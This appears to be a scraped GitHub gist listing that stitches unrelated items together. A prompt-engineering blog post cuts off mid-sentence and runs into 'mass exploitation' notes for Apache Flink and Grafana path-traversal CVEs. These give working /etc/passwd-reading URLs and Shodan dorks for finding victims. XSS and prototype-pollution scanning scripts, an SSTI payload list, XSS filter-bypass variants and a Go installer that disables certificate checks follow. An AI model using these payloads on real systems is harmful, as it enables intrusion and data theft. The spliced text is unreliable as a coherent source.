⛓️
Blood of heroes is closer to the Lord than ink of scholars or prayers of pious.

Jann Moon scumdestroy
@Hellisotherpeople
Hellisotherpeople / blog.md
Last active October 30, 2024 08:38
You probably don't know how to do Prompt Engineering, let me educate you.

You probably don't know how to do Prompt Engineering

(This post could also be titled "Features missing from most LLM front-ends that should exist")

Apologies for the snarky title, but there has been a huge amount of discussion around so called "Prompt Engineering" these past few months on all kinds of platforms. Much of it is coming from individuals who are peddling around an awful lot of "Prompting" and very little "Engineering".

Most of these discussions are little more than users finding that writing more creative and complicated prompts can help them solve a task that a more simple prompt was unable to help with. I claim this is not Prompt Engineering. This is not to say that crafting good prompts is not a difficult task, but it does not involve doing any kind of sophisticated modifications to general "template" of a prompt.

Others, who I think do deserve to call themselves "Prompt Engineers" (and an awful lot more than that), have been writing about and utilizing the rich new eco-system

Mass exploitation of Apache Flink RESTful API Arbitrary File Read vulnerability [CVE-2020-17519]
Description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
Shodan dork: 'Apache Flink'
Affected versions: 1.11.1 and 1.11.2
Vulnerable URL:
https://host:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
Mass exploitation of Grafana 8.x Path Traversal (Pre-Auth) vulnerability (CVE-2021-43798).
Description: Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) are vulnerable to directory traversal, allowing access to local files.
Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
Vulnerable URL:
http://IP:PORT/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
Shodan dork: http.title:"grafana"
@R0X4R
R0X4R / goinstaller.sh
Last active August 1, 2023 08:41
Go language installer for Linux and Debian systems.
#!/usr/bin/env bash
go_version=$(curl -ks https://golang.org/VERSION?m=text)
red_color="\e[31m"
green_color="\e[32m"
no_color="\e[0m"
type -P go &> /dev/null && echo -e "Current go version is ${green_color}$(go version | awk '{print $3}')${no_color}" || echo -e "${red_color}Go is not installed on your system${no_color}"
echo -e "Downloading latest go into your system - version ${green_color}${go_version}${no_color}"
sudo apt purge --auto-remove golang-go 2> /dev/null &> /dev/null
sudo apt clean &> /dev/null
wget https://dl.google.com/go/${go_version}.linux-amd64.tar.gz -q --no-check-certificate 2> /dev/null
@R0X4R
R0X4R / inxss.sh
Last active October 16, 2024 12:05
A fast XSS detector script
#!/bin/bash
#Requirements: KXSS(https://github.com/Emoe/kxss), Dalfox (https://github.com/hahwul/dalfox), QSreplace(https://github.com/tomnomnom/qsreplace)
#Preparation: subfinder -d target.tld -all -silent | httpx -silent | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 100 -o params.txt && cat params.txt | gf xss | sed "s/'/ /g" | sed "s/(/ /g" | sed "s/)/ /g" | qsreplace "FUZZ" 2> /dev/null | anew -q testparams.txt
#Usage: ./inxss.sh testparams.txt target.tld
lists="$1"
# Output directory named after the target plus a timestamp
mkout="$2_$(date +%F_%H_%M_%S)"
mkdir -p "$mkout"
echo -e "Total $(wc -l < "$lists") targets loaded"
sleep 6s
echo -e "[$(date +"%F %H:%M:%S")] Starting scan..."
@R0X4R
R0X4R / taskkiller.sh
Created July 12, 2021 08:19
Helps you to kill unnecessary tasks running on Linux and Ubuntu.
#!/bin/bash
# Task Killer
# Helps you to kill unnecessary tasks running on Linux and Ubuntu.
# Usage: ./taskkiller.sh <process name pattern>
[ -z "$1" ] && { echo "Usage: $0 <process name pattern>"; exit 1; }
echo -e "$1 - Killing task..."
# Count matching processes, dropping the grep process itself from the listing
totaltask=$(ps aux | grep "$1" | sed '/grep/d' | wc -l)
echo -e "Total $totaltask tasks found"
sleep 3s
# Send SIGTERM to every matching PID
ps aux | grep "$1" | sed '/grep/d' | awk '{print $2}' | while read -r line; do kill "$line"; done &> /dev/null
exit 0
@R0X4R
R0X4R / protpscan.sh
Created July 5, 2021 09:45
A prototype pollution vulnerability scanner
#!/bin/bash
# Resolve the target list to an absolute path so it still works after cd
targets=$(realpath "$1")
mkdir -p protpscan
# requirements: https://github.com/detectify/page-fetch, https://github.com/tomnomnom/waybackurls, https://github.com/bp0lr/gauplus, https://github.com/R0X4R/Fuzzy, https://github.com/jaeles-project/gospider, https://snapcraft.io/chromium
# usage: subfinder -d target.com -all -silent | httpx -silent | anew -q /home/targets.txt && ./protpscan.sh /home/targets.txt
cd protpscan || exit 1
echo -e "Total $(wc -l < "$targets") domains loaded to scan"
echo -e "Increasing scope..."
# Collect historical URLs for every domain in parallel
xargs -a "$targets" -P 50 -I % bash -c "echo % | waybackurls" 2> /dev/null | anew -q wayback.txt
gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 300 -o gauplus.txt < "$targets" &> /dev/null
@R0X4R
R0X4R / cudns.txt
Last active November 24, 2021 00:32
Custom common subdomains obtained from different sources
alpblog
www
%20%20%20%20s3
%20%20www
%20.
%20675-ybi-674
%20assets
%20b92
%20connect
%20databank
@R0X4R
R0X4R / sstipayloads.txt
Created July 2, 2021 07:54
SSTI payload list for SSTI scanning
check-ssti{{7*7}}[[1*1]]
check-ssti{{7*7}}
check-ssti{{7*'7'}}
check-ssti<%= 7 * 7 %>
check-ssti${7*7}
check-ssti${{7*7}}
check-ssti@(7*7)
check-ssti#{7*7}
check-ssti#{ 7 * 7 }
@yassineaboukir
yassineaboukir / alert.js
Created March 24, 2021 14:08 — forked from tomnomnom/alert.js
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);